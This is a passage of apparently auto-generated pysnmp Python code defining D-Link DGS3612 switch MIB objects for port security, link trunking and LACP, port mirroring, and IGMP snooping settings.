if mibBuilder.loadTexts: swL2PortSecurityControlTable.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityControlTable.setDescription('port security feature which controls the address leaning capability and the traffic forwarding decision. Each port can have this function enabled or disabled. When it is enabled and a number is given said N, which allows N addresses to be learned at this port, the first N learned addresses are locked at this port as static entry. When the learned addresses number reach N, any coming packet with not learned source addresses are discarded (e.g. dropped) and no more new addresses can be learned at this port.')
swL2PortSecurityControlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2PortSecurityPortIndex"))
if mibBuilder.loadTexts: swL2PortSecurityControlEntry.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityControlEntry.setDescription('A list of information contained in swL2PortSecurityControlTable.')
swL2PortSecurityPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 768))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortSecurityPortIndex.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityPortIndex.setDescription('Indicates the secured port to lock address learning.')
swL2PortSecurityMaxLernAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 64))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortSecurityMaxLernAddr.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityMaxLernAddr.setDescription('Indicates allowable number of addresses to be learned at this port.')
swL2PortSecurityMode = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("other", 1), ("permanent", 2), ("deleteOnTimeout", 3), ("deleteOnReset", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortSecurityMode.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityMode.setDescription('Indicates the mode of locking address. In deleteOnTimeout(3) mode - the locked addresses can be aged out after aging timer expire. In this mode, when the locked address is aged out, the number of address can be learned has to be increased by one. In deleteOnReset(4) mode - never age out the locked addresses unless restart the system to prevent from port movement or intrusion.')
swL2PortSecurityAdmState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("enable", 2), ("disable", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortSecurityAdmState.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityAdmState.setDescription('Indicates administration state of locking address.')
swL2PortSecurityDelCtrl = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 2))
swL2PortSecurityDelVlanName = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 2, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortSecurityDelVlanName.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityDelVlanName.setDescription('Indicates vlan name.')
swL2PortSecurityDelPort = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 2, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 768))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortSecurityDelPort.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityDelPort.setDescription("Indicates the port.0 indicated the function isn't working now.")
swL2PortSecurityDelMacAddress = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 2, 3), MacAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortSecurityDelMacAddress.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityDelMacAddress.setDescription('Specifies MAC address.')
swL2PortSecurityDelActivity = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 2, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("none", 1), ("start", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortSecurityDelActivity.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityDelActivity.setDescription('.')
swL2TrunkMaxSupportedEntries = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2TrunkMaxSupportedEntries.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkMaxSupportedEntries.setDescription('Maximum number of entries in the trunk configuration table (swL2TrunkCtrlTable).')
swL2TrunkCurrentNumEntries = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2TrunkCurrentNumEntries.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkCurrentNumEntries.setDescription('Current actived number of entries in the trunk configuration table.')
swL2TrunkCtrlTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 3), )
if mibBuilder.loadTexts: swL2TrunkCtrlTable.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkCtrlTable.setDescription('This table specifys which ports group a set of ports(up to 8) into a single logical link.')
swL2TrunkCtrlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 3, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2TrunkIndex"))
if mibBuilder.loadTexts: swL2TrunkCtrlEntry.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkCtrlEntry.setDescription('A list of information specifies which ports group a set of ports(up to 8) into a single logical link.')
swL2TrunkIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2TrunkIndex.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkIndex.setDescription('The index of logical port trunk. The trunk group number depend on the existence of unit and module.')
swL2TrunkMasterPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 3, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2TrunkMasterPort.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkMasterPort.setDescription('The object indicates the master port number of the port trunk entry. When using Port Trunk, you can not configure the other ports of the group except the master port. Their configuration must be same as the master port (e.g. speed, duplex, enabled/disabled, flow control, and so on).')
swL2TrunkMember = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 3, 1, 4), PortList()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2TrunkMember.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkMember.setDescription('Indicate how many number of ports is included in this Trunk. The trunk port number depend on the existence of module. The maximum number of ports is 8 for one trunks.')
swL2TrunkFloodingPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 3, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2TrunkFloodingPort.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkFloodingPort.setDescription('The object indicates the flooding port number of the port trunk entry. The first port of the trunk is implicitly configured to be the flooding port.')
swL2TrunkType = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 3, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("static", 2), ("lacp", 3)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2TrunkType.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkType.setDescription('This object indicated that type of the trunk group. static : is static trunk group lacp : is LACP trunk group . ')
swL2TrunkState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 3, 1, 7), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2TrunkState.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkState.setDescription('This object indicates the status of this entry.')
swL2TrunkActivePorts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 3, 1, 8), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2TrunkActivePorts.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkActivePorts.setDescription('The object indicates the active ports of the port trunk entry.')
swL2TrunkAlgorithm = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7))).clone(namedValues=NamedValues(("other", 1), ("mac-source", 2), ("mac-destination", 3), ("mac-source-dest", 4), ("ip-source", 5), ("ip-destination", 6), ("ip-source-dest", 7)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2TrunkAlgorithm.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkAlgorithm.setDescription('This object configures to part of the packet examined by the switch when selecting the egress port for transmitting load-sharing data.')
swL2TrunkLACPPortTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 5), )
if mibBuilder.loadTexts: swL2TrunkLACPPortTable.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkLACPPortTable.setDescription('This table specifys which ports group a set of ports(up to 8) into a single logical link.')
swL2TrunkLACPPortEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 5, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2TrunkLACPPortIndex"))
if mibBuilder.loadTexts: swL2TrunkLACPPortEntry.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkLACPPortEntry.setDescription('A list of information specifies which ports group a set of ports(up to 8) into a single logical link.')
swL2TrunkLACPPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 5, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2TrunkLACPPortIndex.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkLACPPortIndex.setDescription('The index of logical port lacp. ')
swL2TrunkLACPPortState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 5, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("active", 1), ("passive", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2TrunkLACPPortState.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkLACPPortState.setDescription('The state of logical port lacp.')
swL2TrunkVLANTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 6), )
if mibBuilder.loadTexts: swL2TrunkVLANTable.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkVLANTable.setDescription('This table is used to manage the VLAN trunking feature of the device.')
swL2TrunkVLANEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 6, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2TrunkVLANPort"))
if mibBuilder.loadTexts: swL2TrunkVLANEntry.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkVLANEntry.setDescription('This object is used to configure the VLAN trunking settings for each port.')
swL2TrunkVLANPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 6, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2TrunkVLANPort.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkVLANPort.setDescription('This object indicates the port being configured.')
swL2TrunkVLANState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 6, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2TrunkVLANState.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkVLANState.setDescription('The state of the logical port LACP.')
swL2MirrorLogicTargetPort = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2MirrorLogicTargetPort.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorLogicTargetPort.setDescription('This object indicates switch which port will sniff another port. A trunk port member cannot be configured as a target Snooping port. The port number is the sequential (logical) number which is also applied to bridge MIB, etc.')
swL2MirrorPortSourceIngress = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 2), PortList()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2MirrorPortSourceIngress.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorPortSourceIngress.setDescription('The represent the ingress into the source port packet to sniffed.')
swL2MirrorPortSourceEgress = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 3), PortList()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2MirrorPortSourceEgress.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorPortSourceEgress.setDescription('The represent the egress from the source port packet to sniffed.')
swL2MirrorPortState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2MirrorPortState.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorPortState.setDescription('This object indicates the port mirroring state. other(1) - this entry is currently in use but the conditions under which it will remain so are different from each of the following values. disabled(2) - writing this value to the object, and then the corresponding entry will be removed from the table. enabled(3) - this entry is reside in the table.')
swL2MirrorGroupTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 5), )
if mibBuilder.loadTexts: swL2MirrorGroupTable.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorGroupTable.setDescription('This table specifies information about the Mirror group configuration.')
swL2MirrorGroupEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 5, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2MirrorGroupID"))
if mibBuilder.loadTexts: swL2MirrorGroupEntry.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorGroupEntry.setDescription('A list of information about each Mirror group configuration.')
swL2MirrorGroupID = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 5, 1, 1), Integer32())
if mibBuilder.loadTexts: swL2MirrorGroupID.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorGroupID.setDescription('This object indicates the mirror group. The range of this object is (1..n), the value of n depends on detail project. ')
swL2MirrorGroupRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 5, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2MirrorGroupRowStatus.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorGroupRowStatus.setDescription('This object manages this mirror group entry.')
swL2MirrorGroupState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 5, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2MirrorGroupState.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorGroupState.setDescription('This object indicates the mirror group state.')
swL2MirrorGroupLogicTargetPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 5, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2MirrorGroupLogicTargetPort.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorGroupLogicTargetPort.setDescription('This object indicates the mirror group target port.')
swL2MirrorGroupPortSourceIngress = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 5, 1, 5), PortList()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2MirrorGroupPortSourceIngress.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorGroupPortSourceIngress.setDescription('This object indicates the mirror group ingress source ports.')
swL2MirrorGroupPortSourceEngress = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 5, 1, 6), PortList()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2MirrorGroupPortSourceEngress.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorGroupPortSourceEngress.setDescription('This object indicates the mirror group engress source ports.')
swL2IGMPMaxSupportedVlans = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPMaxSupportedVlans.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMaxSupportedVlans.setDescription('Maximum number of Vlans in the layer 2 IGMP control table (swL2IGMPCtrlTable).')
swL2IGMPMaxIpGroupNumPerVlan = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPMaxIpGroupNumPerVlan.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMaxIpGroupNumPerVlan.setDescription('Maximum number of multicast ip group per Vlan in the layer 2 IGMP information table (swL2IGMPQueryInfoTable).')
swL2IGMPCtrlTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3), )
if mibBuilder.loadTexts: swL2IGMPCtrlTable.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPCtrlTable.setDescription("The table controls the Vlan's IGMP function. Its scale depends on current VLAN state (swL2VlanInfoStatus). If VLAN is disabled mode, there is only one entry in the table, with index 1. If VLAN is in Port-Base or 802.1q mode, the number of entries can be up to 12, with index range from 1 to 12.")
swL2IGMPCtrlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2IGMPCtrlVid"))
if mibBuilder.loadTexts: swL2IGMPCtrlEntry.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPCtrlEntry.setDescription('The entry in IGMP control table (swL2IGMPCtrlTable). The entry is effective only when IGMP capture switch (swL2DevCtrlIGMPSnooping) is enabled.')
swL2IGMPCtrlVid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPCtrlVid.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPCtrlVid.setDescription("This object indicates the IGMP control entry's VLAN id. If VLAN is disabled, the Vid is always 0 and cannot be changed by management users. If VLAN is in Port-Base mode, the Vid is arranged from 1 to 12, fixed form. If VLAN is in 802.1q mode, the Vid setting can vary from 1 to 4094 by management user, and the Vid in each entry must be unique in the IGMP Control Table.")
swL2IGMPQueryInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535)).clone(125)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPQueryInterval.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPQueryInterval.setDescription('The frequency at which IGMP Host-Query packets are transmitted on this switch.')
swL2IGMPMaxResponseTime = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 25)).clone(10)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPMaxResponseTime.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMaxResponseTime.setDescription('The maximum query response time on this switch.')
swL2IGMPRobustness = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 255)).clone(2)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPRobustness.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPRobustness.setDescription('The Robustness Variable allows tuning for the expected packet loss on a subnet. If a subnet is expected to be lossy, the Robustness Variable may be increased. IGMP is robust to (Robustness Variable-1) packet losses.')
swL2IGMPLastMemberQueryInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 25)).clone(1)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPLastMemberQueryInterval.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPLastMemberQueryInterval.setDescription('The Last Member Query Interval is the Max Response Time inserted into Group-Specific Queries sent in response to Leave Group messages, and is also the amount of time between Group-Specific Query messages.')
swL2IGMPHostTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 16711450)).clone(260)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPHostTimeout.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPHostTimeout.setDescription('The timer value for sending IGMP query packet when none was sent by the host in the LAN. The timer works in per-VLAN basis. Our device will be activated to send the query message if the timer is expired. Please reference RFC2236-1997.')
swL2IGMPRouteTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 16711450)).clone(260)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPRouteTimeout.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPRouteTimeout.setDescription('The Router Timeout is how long a host must wait after hearing a Query before it may send any IGMPv2 messages.')
swL2IGMPLeaveTimer = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 16711450)).clone(1)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPLeaveTimer.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPLeaveTimer.setDescription('When a querier receives a Leave Group message for a group that has group members on the reception interface, it sends Group-Specific Queries every swL2IGMPLeaveTimer to the group being left.')
swL2IGMPQueryState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPQueryState.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPQueryState.setDescription('This object decide the IGMP query enabled or disabled.')
swL2IGMPCurrentState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("querier", 2), ("non-querier", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPCurrentState.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPCurrentState.setDescription('This object indicates the current IGMP query state.')
swL2IGMPCtrlState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disable", 2), ("enable", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPCtrlState.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPCtrlState.setDescription('This object indicates the status of this entry. other(1) - this entry is currently in use but the conditions under which it will remain so are different from each of the following values. disable(2) - IGMP funtion is disabled for this entry. enable(3) - IGMP funtion is enabled for this entry.')
swL2IGMPFastLeaveState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disable", 2), ("enable", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPFastLeaveState.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPFastLeaveState.setDescription('This object indicates the fast_leave status of this entry. other(1) - this entry is currently in use but the conditions under which it will remain so are different from each of the following values. disable(2) - IGMP fast-leave funtion is disabled for this entry. enable(3) - IGMP fast-leave funtion is enabled for this entry.')
swL2IGMPQueryVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 3))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPQueryVersion.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPQueryVersion.setDescription('Configure the IGMP version of query packet which will be sent by the router.')
swL2IGMPReportSuppression = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 15), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPReportSuppression.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPReportSuppression.setDescription('When enabled, multiple IGMP reports or leaves for a specific group (S,G) will be integrated into only one report before being sent to the router port.')
swL2IGMPQueryInfoTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 4), )
if mibBuilder.loadTexts: swL2IGMPQueryInfoTable.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPQueryInfoTable.setDescription('The table contains the number current IGMP query packets which is captured by this device, as well as the IGMP query packets sent by the device.')
swL2IGMPQueryInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 4, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2IGMPInfoVid"))
if mibBuilder.loadTexts: swL2IGMPQueryInfoEntry.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPQueryInfoEntry.setDescription('Information about current IGMP query information, provided that swL2DevCtrlIGMPSnooping and swL2IGMPCtrState of associated VLAN entry are all enabled.')
swL2IGMPInfoVid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 4, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPInfoVid.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPInfoVid.setDescription('This object indicates the Vid of associated IGMP info table entry. It follows swL2IGMPCtrlVid in the associated entry of IGMP control table (swL2IGMPCtrlTable).')
swL2IGMPInfoQueryCount = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 4, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPInfoQueryCount.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPInfoQueryCount.setDescription('This object indicates the number of query packets received since the IGMP function enabled, in per-VLAN basis.')
swL2IGMPInfoTxQueryCount = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 4, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPInfoTxQueryCount.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPInfoTxQueryCount.setDescription('This object indicates the send count of IGMP query messages, in per-VLAN basis. In case of IGMP timer expiration, the switch sends IGMP query packets to related VLAN member ports and increment this object by 1.')
swL2IGMPInfoTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 5), )
if mibBuilder.loadTexts: swL2IGMPInfoTable.setStatus('current')
